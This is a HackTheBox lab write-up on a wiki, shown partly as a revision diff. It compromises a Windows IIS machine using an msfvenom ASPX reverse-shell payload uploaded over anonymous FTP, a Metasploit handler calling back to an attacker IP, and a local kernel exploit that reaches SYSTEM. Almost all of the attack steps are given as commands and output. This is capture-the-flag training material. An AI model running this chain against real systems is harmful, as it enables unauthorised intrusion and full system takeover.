(Created page with "Category:HackTheBox <nowiki>= NMAP =</nowiki> <nowiki><syntaxhighlight lang="bash">Starting Nmap 7.93 ( https://nmap.org</nowiki> ) at 2022-12-21 21:06 MST Nmap scan report for 10.129.28.254 Host is up (0.064s latency). Not shown: 998 filtered tcp ports (no-response) PORT STATE SERVICE VERSION 21/tcp open ftp Microsoft ftpd | ftp-syst: |_ SYST: Windows_NT | ftp-anon: Anonymous FTP login allowed (FTP code 230) | 03-18-17 01:06AM <DIR>...") |
No edit summary |
||
| Line 1: | Line 1: | ||
[[Category:HackTheBox]] | [[Category:HackTheBox]] | ||
= NMAP = | |||
<syntaxhighlight lang="bash">Starting Nmap 7.93 ( https://nmap.org ) at 2022-12-21 21:06 MST | |||
Nmap scan report for 10.129.28.254 | Nmap scan report for 10.129.28.254 | ||
Host is up (0.064s latency). | Host is up (0.064s latency). | ||
Not shown: 998 filtered tcp ports (no-response) | Not shown: 998 filtered tcp ports (no-response) | ||
PORT STATE SERVICE VERSION | |||
PORT | 21/tcp open ftp Microsoft ftpd | ||
21/tcp | |||
| ftp-syst: | | ftp-syst: | ||
|_ SYST: Windows_NT | |||
| | |||
| ftp-anon: Anonymous FTP login allowed (FTP code 230) | | ftp-anon: Anonymous FTP login allowed (FTP code 230) | ||
| 03-18-17 01:06AM <DIR> aspnet_client | |||
| 03-18- | | 03-17-17 04:37PM 689 iisstart.htm | ||
| 12-22-22 01:27AM 897112 r.aspx | |||
| 03-17- | | 12-22-22 01:17AM 2921 rev.aspx | ||
| 12-22-22 01:06AM 2935 reverse.aspx | |||
| 12-22- | |_03-17-17 04:37PM 184946 welcome.png | ||
80/tcp open http Microsoft IIS httpd 7.5 | |||
| 12-22- | |||
| 12-22- | |||
|_03-17- | |||
80/tcp | |||
|_http-server-header: Microsoft-IIS/7.5 | |_http-server-header: Microsoft-IIS/7.5 | ||
| http-methods: | | http-methods: | ||
|_ Potentially risky methods: TRACE | |||
| | |||
|_http-title: IIS7 | |_http-title: IIS7 | ||
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows | Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows | ||
Service detection performed. Please report any incorrect results at | Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . | ||
Nmap done: 1 IP address (1 host up) scanned in 20.11 seconds</syntaxhighlight> | |||
Nmap done: 1 IP address (1 host up) scanned in 20.11 seconds | = USER = | ||
< | Generate payload with <code>msfvenom</code> | ||
<syntaxhighlight lang="bash">msfvenom -p windows/meterpreter_reverse_tcp LHOST=10.10.16.18 LPORT=4444 -f aspx > r.aspx </syntaxhighlight> | |||
Upload to FTP with <code>anonymous</code> login we noticed from nmap | |||
Upload to FTP with | |||
<syntaxhighlight lang="bash">❯ ftp anonymous@10.129.28.254 | |||
Connected to 10.129.28.254. | Connected to 10.129.28.254. | ||
220 Microsoft FTP Service | 220 Microsoft FTP Service | ||
331 Anonymous access allowed, send identity (e-mail name) as password. | 331 Anonymous access allowed, send identity (e-mail name) as password. | ||
Password: | Password: | ||
230 User logged in. | 230 User logged in. | ||
Remote system type is Windows_NT. | Remote system type is Windows_NT. | ||
ftp> put r.aspx | |||
ftp> put r.aspx | 200 PORT command successful. | ||
200 PORT command successful. | |||
125 Data connection already open; Transfer starting. | 125 Data connection already open; Transfer starting. | ||
226 Transfer complete. | 226 Transfer complete. | ||
897112 bytes sent in 0.711 seconds (1.2 Mbytes/s) | 897112 bytes sent in 0.711 seconds (1.2 Mbytes/s) | ||
ftp> dir | ftp> dir | ||
200 PORT command successful. | 200 PORT command successful. | ||
150 Opening ASCII mode data connection. | 150 Opening ASCII mode data connection. | ||
03-18-17 01:06AM <DIR> aspnet_client | |||
03-18- | 03-17-17 04:37PM 689 iisstart.htm | ||
12-22-22 01:27AM 897112 r.aspx | |||
03-17- | 12-22-22 01:17AM 2921 rev.aspx | ||
12-22-22 01:06AM 2935 reverse.aspx | |||
12-22- | 03-17-17 04:37PM 184946 welcome.png | ||
12-22- | |||
12-22- | |||
03-17- | |||
226 Transfer complete. | 226 Transfer complete. | ||
ftp> rm rev.aspx | ftp> rm rev.aspx | ||
550 The directory name is invalid. | 550 The directory name is invalid. | ||
ftp> | ftp> | ||
</syntaxhighlight> | |||
Setup listener within metasploit and visit <code>http://10.129.28.254/r.aspx</code> | |||
<syntaxhighlight lang="bash">msf6 exploit(multi/handler) > set lhost 10.10.16.18 | |||
lhost => 10.10.16.18 | lhost => 10.10.16.18 | ||
msf6 exploit(multi/handler) > set payload windows/meterpreter_reverse_tcp | msf6 exploit(multi/handler) > set payload windows/meterpreter_reverse_tcp | ||
payload => windows/meterpreter_reverse_tcp | payload => windows/meterpreter_reverse_tcp | ||
msf6 exploit(multi/handler) > show options | msf6 exploit(multi/handler) > show options | ||
Module options (exploit/multi/handler): | Module options (exploit/multi/handler): | ||
Name Current Setting Required Description | |||
---- --------------- -------- ----------- | |||
Payload options (windows/meterpreter_reverse_tcp): | Payload options (windows/meterpreter_reverse_tcp): | ||
Name Current Setting Required Description | |||
---- --------------- -------- ----------- | |||
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) | |||
EXTENSIONS no Comma-separate list of extensions to load | |||
EXTINIT no Initialization strings for extensions | |||
LHOST 10.10.16.18 yes The listen address (an interface may be specified) | |||
LPORT 4444 yes The listen port | |||
Exploit target: | Exploit target: | ||
Id Name | |||
-- ---- | |||
0 Wildcard Target | |||
View the full module info with the info, or info -d command. | View the full module info with the info, or info -d command. | ||
| Line 155: | Line 98: | ||
[*] Started reverse TCP handler on 10.10.16.18:4444 | [*] Started reverse TCP handler on 10.10.16.18:4444 | ||
[*] Meterpreter session 1 opened (10.10.16.18:4444 -> 10.129.28.254:49257) at 2022-12-21 21:13:22 -0700 | [*] Meterpreter session 1 opened (10.10.16.18:4444 -> 10.129.28.254:49257) at 2022-12-21 21:13:22 -0700 | ||
meterpreter > | meterpreter > | ||
meterpreter > getuid | meterpreter > getuid | ||
Server username: IIS APPPOOL\Web</syntaxhighlight> | |||
Server username: IIS APPPOOL\Web | = Privlege Escalation = | ||
Now search exploit suggester. | Now search exploit suggester. | ||
<syntaxhighlight lang="bash">msf6 post(multi/recon/local_exploit_suggester) > set session 1 | |||
session => 1 | |||
session => 1 | msf6 post(multi/recon/local_exploit_suggester) > exploit | ||
# Name Potentially Vulnerable? Check Result | |||
msf6 post(multi/recon/local_exploit_suggester) > | - ---- ----------------------- ------------ | ||
1 exploit/windows/local/bypassuac_eventvwr Yes The target appears to be vulnerable. | |||
2 exploit/windows/local/ms10_015_kitrap0d Yes The service is running, but could not be validated. | |||
3 exploit/windows/local/ms10_092_schelevator Yes The service is running, but could not be validated. | |||
- | 4 exploit/windows/local/ms13_053_schlamperei Yes The target appears to be vulnerable. | ||
5 exploit/windows/local/ms13_081_track_popup_menu Yes The target appears to be vulnerable. | |||
1 | 6 exploit/windows/local/ms14_058_track_popup_menu Yes The target appears to be vulnerable. | ||
7 exploit/windows/local/ms15_004_tswbproxy Yes The service is running, but could not be validated. | |||
2 | 8 exploit/windows/local/ms15_051_client_copy_image Yes The target appears to be vulnerable. | ||
9 exploit/windows/local/ms16_016_webdav Yes The service is running, but could not be validated. | |||
3 | 10 exploit/windows/local/ms16_032_secondary_logon_handle_privesc Yes The service is running, but could not be validated. | ||
11 exploit/windows/local/ms16_075_reflection Yes The target appears to be vulnerable. | |||
4 | 12 exploit/windows/local/ntusermndragover Yes The target appears to be vulnerable. | ||
13 exploit/windows/local/ppr_flatten_rec Yes The target appears to be vulnerable.</syntaxhighlight> | |||
5 | |||
6 | |||
7 | |||
8 | |||
9 | |||
Winner winner! | Winner winner! | ||
<syntaxhighlight lang="bash">msf6 exploit(windows/local/ms13_053_schlamperei) > exploit | |||
[*] Started reverse TCP handler on 10.10.16.18:4443 | [*] Started reverse TCP handler on 10.10.16.18:4443 | ||
[*] Launching notepad to host the exploit... | [*] Launching notepad to host the exploit... | ||
[+] Process 2724 launched. | [+] Process 2724 launched. | ||
[*] Reflectively injecting the exploit DLL into 2724... | [*] Reflectively injecting the exploit DLL into 2724... | ||
[*] Injecting exploit into 2724... | [*] Injecting exploit into 2724... | ||
[*] Found winlogon.exe with PID 432 | [*] Found winlogon.exe with PID 432 | ||
[*] Sending stage (175686 bytes) to 10.129.28.254 | [*] Sending stage (175686 bytes) to 10.129.28.254 | ||
[+] Everything seems to have worked, cross your fingers and wait for a SYSTEM shell | [+] Everything seems to have worked, cross your fingers and wait for a SYSTEM shell | ||
[*] Meterpreter session 2 opened (10.10.16.18:4443 -> 10.129.28.254:49259) at 2022-12-21 21:23:35 -0700 | [*] Meterpreter session 2 opened (10.10.16.18:4443 -> 10.129.28.254:49259) at 2022-12-21 21:23:35 -0700 | ||
meterpreter > getui | meterpreter > getui | ||
[-] Unknown command: getui | [-] Unknown command: getui | ||
meterpreter > getuid | meterpreter > getuid | ||
Server username: NT AUTHORITY\SYSTEM | Server username: NT AUTHORITY\SYSTEM | ||
</syntaxhighlight> | |||
Revision as of 17:41, 20 January 2023
NMAP
Starting Nmap 7.93 ( https://nmap.org ) at 2022-12-21 21:06 MST
Nmap scan report for 10.129.28.254
Host is up (0.064s latency).
Not shown: 998 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-syst:
|_ SYST: Windows_NT
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 03-18-17 01:06AM <DIR> aspnet_client
| 03-17-17 04:37PM 689 iisstart.htm
| 12-22-22 01:27AM 897112 r.aspx
| 12-22-22 01:17AM 2921 rev.aspx
| 12-22-22 01:06AM 2935 reverse.aspx
|_03-17-17 04:37PM 184946 welcome.png
80/tcp open http Microsoft IIS httpd 7.5
|_http-server-header: Microsoft-IIS/7.5
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: IIS7
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 20.11 seconds
USER
Generate payload with msfvenom
msfvenom -p windows/meterpreter_reverse_tcp LHOST=10.10.16.18 LPORT=4444 -f aspx > r.aspx
Upload to FTP with anonymous login we noticed from nmap
❯ ftp anonymous@10.129.28.254
Connected to 10.129.28.254.
220 Microsoft FTP Service
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> put r.aspx
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
897112 bytes sent in 0.711 seconds (1.2 Mbytes/s)
ftp> dir
200 PORT command successful.
150 Opening ASCII mode data connection.
03-18-17 01:06AM <DIR> aspnet_client
03-17-17 04:37PM 689 iisstart.htm
12-22-22 01:27AM 897112 r.aspx
12-22-22 01:17AM 2921 rev.aspx
12-22-22 01:06AM 2935 reverse.aspx
03-17-17 04:37PM 184946 welcome.png
226 Transfer complete.
ftp> rm rev.aspx
550 The directory name is invalid.
ftp>
Setup listener within metasploit and visit http://10.129.28.254/r.aspx
msf6 exploit(multi/handler) > set lhost 10.10.16.18
lhost => 10.10.16.18
msf6 exploit(multi/handler) > set payload windows/meterpreter_reverse_tcp
payload => windows/meterpreter_reverse_tcp
msf6 exploit(multi/handler) > show options
Module options (exploit/multi/handler):
Name Current Setting Required Description
---- --------------- -------- -----------
Payload options (windows/meterpreter_reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
EXTENSIONS no Comma-separate list of extensions to load
EXTINIT no Initialization strings for extensions
LHOST 10.10.16.18 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Wildcard Target
View the full module info with the info, or info -d command.
msf6 exploit(multi/handler) > exploit
[*] Started reverse TCP handler on 10.10.16.18:4444
[*] Meterpreter session 1 opened (10.10.16.18:4444 -> 10.129.28.254:49257) at 2022-12-21 21:13:22 -0700
meterpreter >
meterpreter > getuid
Server username: IIS APPPOOL\Web
Privlege Escalation
Now search exploit suggester.
msf6 post(multi/recon/local_exploit_suggester) > set session 1
session => 1
msf6 post(multi/recon/local_exploit_suggester) > exploit
# Name Potentially Vulnerable? Check Result
- ---- ----------------------- ------------
1 exploit/windows/local/bypassuac_eventvwr Yes The target appears to be vulnerable.
2 exploit/windows/local/ms10_015_kitrap0d Yes The service is running, but could not be validated.
3 exploit/windows/local/ms10_092_schelevator Yes The service is running, but could not be validated.
4 exploit/windows/local/ms13_053_schlamperei Yes The target appears to be vulnerable.
5 exploit/windows/local/ms13_081_track_popup_menu Yes The target appears to be vulnerable.
6 exploit/windows/local/ms14_058_track_popup_menu Yes The target appears to be vulnerable.
7 exploit/windows/local/ms15_004_tswbproxy Yes The service is running, but could not be validated.
8 exploit/windows/local/ms15_051_client_copy_image Yes The target appears to be vulnerable.
9 exploit/windows/local/ms16_016_webdav Yes The service is running, but could not be validated.
10 exploit/windows/local/ms16_032_secondary_logon_handle_privesc Yes The service is running, but could not be validated.
11 exploit/windows/local/ms16_075_reflection Yes The target appears to be vulnerable.
12 exploit/windows/local/ntusermndragover Yes The target appears to be vulnerable.
13 exploit/windows/local/ppr_flatten_rec Yes The target appears to be vulnerable.
Winner winner!
msf6 exploit(windows/local/ms13_053_schlamperei) > exploit
[*] Started reverse TCP handler on 10.10.16.18:4443
[*] Launching notepad to host the exploit...
[+] Process 2724 launched.
[*] Reflectively injecting the exploit DLL into 2724...
[*] Injecting exploit into 2724...
[*] Found winlogon.exe with PID 432
[*] Sending stage (175686 bytes) to 10.129.28.254
[+] Everything seems to have worked, cross your fingers and wait for a SYSTEM shell
[*] Meterpreter session 2 opened (10.10.16.18:4443 -> 10.129.28.254:49259) at 2022-12-21 21:23:35 -0700
meterpreter > getui
[-] Unknown command: getui
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM